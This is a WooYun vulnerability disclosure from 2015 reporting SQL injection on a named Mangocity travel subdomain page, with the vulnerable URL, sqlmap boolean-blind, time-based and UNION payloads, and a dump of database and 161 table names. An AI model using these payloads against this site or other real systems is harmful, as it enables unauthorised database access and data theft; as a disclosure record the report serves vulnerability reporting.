当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0136847

漏洞标题:芒果网某站存在SQL注入漏洞之二

相关厂商:芒果网

漏洞作者: Xmyth_夏洛克

提交时间:2015-08-25 16:26

修复时间:2015-08-30 16:28

公开时间:2015-08-30 16:28

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-08-25: 细节已通知厂商并且等待厂商处理中
2015-08-30: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

23333

详细说明:

存在注入页面:
http://bj.mangocity.com/visa/article.jsp?jspmaker_act_id=101

存在注入页面.png


用单引号尝试,报错

报错.png


放入sqlmap跑,三个库

255C.tmp.jpg


漏洞证明:

161个表

161个表.png


Parameter: jspmaker_act_id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: jspmaker_act_id=101 AND 1503=1503
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: jspmaker_act_id=101 AND (SELECT * FROM (SELECT(SLEEP(5)))kUwL)
Type: UNION query
Title: Generic UNION query (NULL) - 7 columns
Payload: jspmaker_act_id=-8503 UNION ALL SELECT NULL,NULL,CONCAT(0x71716a7671,0x56706f5471597a4c7a53,0x71786a7a71),NULL,NULL,NULL,NULL--
---
web application technology: JSP
back-end DBMS: MySQL 5.0.12
available databases [3]:
[*] information_schema
[*] test
[*] ut7
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: jspmaker_act_id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: jspmaker_act_id=101 AND 1503=1503
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: jspmaker_act_id=101 AND (SELECT * FROM (SELECT(SLEEP(5)))kUwL)
Type: UNION query
Title: Generic UNION query (NULL) - 7 columns
Payload: jspmaker_act_id=-8503 UNION ALL SELECT NULL,NULL,CONCAT(0x71716a7671,0x56706f5471597a4c7a53,0x71786a7a71),NULL,NULL,NULL,NULL--
---
web application technology: JSP
back-end DBMS: MySQL 5.0.12
Database: ut7
[161 tables]
+---------------------------+
| account_info |
| call_post_set |
| comments |
| comments_reply |
| crm_info |
| dev_data_fields |
| dev_data_table |
| dev_input_field |
| dev_page_input |
| dev_template |
| fm_parameter |
| fm_parameter_set |
| fm_receivables_payables |
| g_accessory |
| g_fm_accounting |
| g_fm_advertisement |
| g_fm_inspect |
| g_fm_person_brokerage |
| g_sign_state |
| gather_document |
| gl_season_destination |
| gl_strategy |
| gl_strategy_page_block |
| hc_train_info |
| high_custom |
| hk_airlines_info |
| hk_flight_info |
| hk_models |
| hotel_basic_info |
| hotel_photo |
| hotel_price_info |
| hotel_room_info |
| income_expenses_single |
| insurance_company |
| insurance_info |
| jd_facility |
| jd_group_info |
| jd_hotel_info |
| jd_photo |
| jd_room_info |
| l_photo |
| member_log |
| mobile_web_page_block |
| monthly_balance |
| oa_appliance |
| oa_leave |
| oa_notice |
| oa_purchase |
| oa_purchase_log |
| oa_report_annul |
| oa_report_annul_log |
| oa_supplier |
| oa_userget |
| old_order |
| online_ask |
| optional_order |
| order_basic_info |
| order_checkseat |
| order_doc |
| order_file |
| order_finance_statistics |
| order_gathering |
| order_insurance |
| order_invoice |
| order_other_cost |
| order_outteam |
| order_pay |
| order_pay_log |
| order_pledge |
| order_reality_data |
| order_refund |
| order_remark |
| order_supplier |
| order_visit |
| order_visit_log |
| os_accessory_file |
| os_city |
| os_company |
| os_country |
| os_data_source |
| os_fileup |
| os_function |
| os_g_destination |
| os_g_trip_type |
| os_help |
| os_log |
| os_login_user |
| os_module |
| os_order |
| os_photo |
| os_province |
| os_suggest |
| os_system |
| pay_order |
| personal_quick |
| phone_to_callcenter |
| qc_car_info |
| qc_group_info |
| reg_member |
| reg_tables |
| remit_info |
| reply_question |
| scenic_info |
| scenic_photo |
| self_expense |
| set_of_book |
| sign_contract |
| sms_date |
| sms_log |
| sms_port |
| sort_table |
| strategy_article |
| strategy_aspect_info |
| strategy_destination_info |
| strategy_photo |
| strategy_web_column |
| system_seting |
| system_variable |
| t_ad |
| t_admin |
| t_article |
| t_base_trans |
| t_category |
| t_commen |
| t_gather |
| t_gatherhis |
| t_keywords |
| t_label |
| t_role |
| t_source |
| t_special |
| t_template |
| t_vote |
| t_voteitem |
| t_web_seting |
| tour_aspect |
| tour_basic_info |
| tour_basic_info_order |
| tour_destination |
| tour_price_info |
| tour_price_info_order |
| tour_schedule_info |
| tour_shoping |
| tour_stard_info |
| tour_time |
| trip_type |
| user_department |
| user_msg |
| visa_basic_info |
| visa_reservation |
| visa_test |
| visitor_list |
| web_article |
| web_column |
| web_custom |
| web_email_subscriptions |
| web_error_page |
| web_friendly_link |
| web_page_block |
| web_set_tour_aspect |
| web_set_tour_destination |
+---------------------------+

修复方案:

过滤

版权声明:转载请注明来源 Xmyth_夏洛克@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-08-30 16:28

厂商回复:

漏洞Rank:15 (WooYun评价)

最新状态:

暂无